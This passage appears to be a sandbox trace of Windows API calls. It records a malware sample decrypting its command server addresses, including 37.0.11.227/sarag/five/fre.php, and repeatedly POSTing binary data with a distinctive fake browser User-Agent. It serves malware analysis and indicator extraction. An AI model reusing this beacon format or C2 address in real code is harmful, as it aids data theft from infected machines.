HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0334.951] GetProcessHeap () returned 0x690000 [0334.951] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0334.951] GetProcessHeap () returned 0x690000 [0334.952] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0334.952] GetProcessHeap () returned 0x690000 [0334.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0334.952] GetProcessHeap () returned 0x690000 [0334.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0334.953] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0334.954] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0334.954] GetProcessHeap () returned 0x690000 [0334.954] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0334.954] GetProcessHeap () returned 0x690000 [0334.954] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0334.955] send (s=0xbdc, buf=0x6ad508*, len=242, flags=0) returned 242 [0334.955] send (s=0xbdc, buf=0x6aba40*, len=159, flags=0) returned 159 [0334.955] GetProcessHeap () returned 0x690000 [0334.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0334.955] recv (in: s=0xbdc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0335.032] GetProcessHeap () returned 0x690000 [0335.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0335.033] GetProcessHeap () returned 0x690000 [0335.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0335.034] GetProcessHeap () returned 0x690000 [0335.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0335.035] GetProcessHeap () returned 0x690000 [0335.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0335.035] closesocket (s=0xbdc) returned 0 [0335.036] GetProcessHeap () returned 0x690000 [0335.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0335.036] GetProcessHeap () returned 0x690000 [0335.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0335.036] GetProcessHeap () returned 0x690000 [0335.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0335.037] GetProcessHeap () returned 0x690000 [0335.037] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0335.037] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1928) returned 0xbdc [0335.041] Sleep (dwMilliseconds=0xea60) [0335.042] GetProcessHeap () returned 0x690000 [0335.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0335.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.044] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0335.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.052] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0335.063] GetProcessHeap () returned 0x690000 [0335.063] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0335.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.064] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0335.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.065] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0335.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.066] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0335.066] GetProcessHeap () returned 0x690000 [0335.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0335.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.068] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0335.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.068] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0335.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.069] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0335.069] GetProcessHeap () returned 0x690000 [0335.069] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0335.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.070] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0335.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.071] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0335.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.072] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0335.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.073] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0335.073] GetProcessHeap () returned 0x690000 [0335.073] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0335.073] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0335.077] GetProcessHeap () returned 0x690000 [0335.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0335.077] GetProcessHeap () returned 0x690000 [0335.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0335.078] GetProcessHeap () returned 0x690000 [0335.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0335.078] GetProcessHeap () returned 0x690000 [0335.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0335.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.079] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0335.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.086] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0335.092] GetProcessHeap () returned 0x690000 [0335.092] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0335.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.093] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0335.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.095] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0335.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.096] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0335.096] GetProcessHeap () returned 0x690000 [0335.097] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0335.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.098] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0335.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.098] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0335.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.099] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0335.099] GetProcessHeap () returned 0x690000 [0335.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0335.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.100] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0335.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.101] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0335.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.102] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0335.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.103] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0335.103] GetProcessHeap () returned 0x690000 [0335.103] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0335.103] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0335.103] GetProcessHeap () returned 0x690000 [0335.103] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0335.103] socket (af=2, type=1, protocol=6) returned 0xbe0 [0335.103] connect (s=0xbe0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0335.129] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0335.129] GetProcessHeap () returned 0x690000 [0335.129] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0335.129] GetProcessHeap () returned 0x690000 [0335.129] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0335.130] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0335.131] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0335.131] GetProcessHeap () returned 0x690000 [0335.131] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0335.131] GetProcessHeap () returned 0x690000 [0335.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0335.132] GetProcessHeap () returned 0x690000 [0335.132] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0335.132] GetProcessHeap () returned 0x690000 [0335.132] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0335.132] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0335.133] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0335.133] GetProcessHeap () returned 0x690000 [0335.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0335.133] GetProcessHeap () returned 0x690000 [0335.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0335.134] send (s=0xbe0, buf=0x6ad508*, len=242, flags=0) returned 242 [0335.134] send (s=0xbe0, buf=0x6aba40*, len=159, flags=0) returned 159 [0335.134] GetProcessHeap () returned 0x690000 [0335.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0335.134] recv (in: s=0xbe0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0335.235] GetProcessHeap () returned 0x690000 [0335.236] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0335.236] GetProcessHeap () returned 0x690000 [0335.236] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0335.236] GetProcessHeap () returned 0x690000 [0335.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0335.238] GetProcessHeap () returned 0x690000 [0335.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0335.238] closesocket (s=0xbe0) returned 0 [0335.241] GetProcessHeap () returned 0x690000 [0335.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0335.241] GetProcessHeap () returned 0x690000 [0335.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0335.241] GetProcessHeap () returned 0x690000 [0335.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0335.242] GetProcessHeap () returned 0x690000 [0335.242] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0335.242] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1930) returned 0xbe0 [0335.246] Sleep (dwMilliseconds=0xea60) [0335.247] GetProcessHeap () returned 0x690000 [0335.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0335.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.252] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0335.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.268] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0335.282] GetProcessHeap () returned 0x690000 [0335.282] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0335.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.284] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0335.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.285] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0335.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.286] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0335.286] GetProcessHeap () returned 0x690000 [0335.287] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0335.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.288] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0335.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.289] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0335.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.291] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0335.291] GetProcessHeap () returned 0x690000 [0335.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0335.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.294] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0335.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.296] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0335.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.297] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0335.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.298] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0335.298] GetProcessHeap () returned 0x690000 [0335.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0335.298] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0335.298] GetProcessHeap () returned 0x690000 [0335.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0335.299] GetProcessHeap () returned 0x690000 [0335.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0335.299] GetProcessHeap () returned 0x690000 [0335.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0335.300] GetProcessHeap () returned 0x690000 [0335.300] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0335.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.304] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0335.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.311] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0335.318] GetProcessHeap () returned 0x690000 [0335.318] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0335.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.338] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0335.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.345] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0335.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.348] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0335.348] GetProcessHeap () returned 0x690000 [0335.348] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0335.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.349] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0335.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.350] CryptDestroyKey (hKey=0x69d028) returned 1 [0335.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.351] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0335.351] GetProcessHeap () returned 0x690000 [0335.351] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0335.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.352] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0335.353] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.353] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0335.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.354] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0335.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.355] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0335.355] GetProcessHeap () returned 0x690000 [0335.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0335.355] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0335.355] GetProcessHeap () returned 0x690000 [0335.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0335.355] socket (af=2, type=1, protocol=6) returned 0xbe4 [0335.356] connect (s=0xbe4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0335.384] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0335.384] GetProcessHeap () returned 0x690000 [0335.384] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0335.384] GetProcessHeap () returned 0x690000 [0335.384] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0335.385] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0335.385] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0335.385] GetProcessHeap () returned 0x690000 [0335.385] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0335.385] GetProcessHeap () returned 0x690000 [0335.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0335.386] GetProcessHeap () returned 0x690000 [0335.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0335.386] GetProcessHeap () returned 0x690000 [0335.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0335.387] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0335.387] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 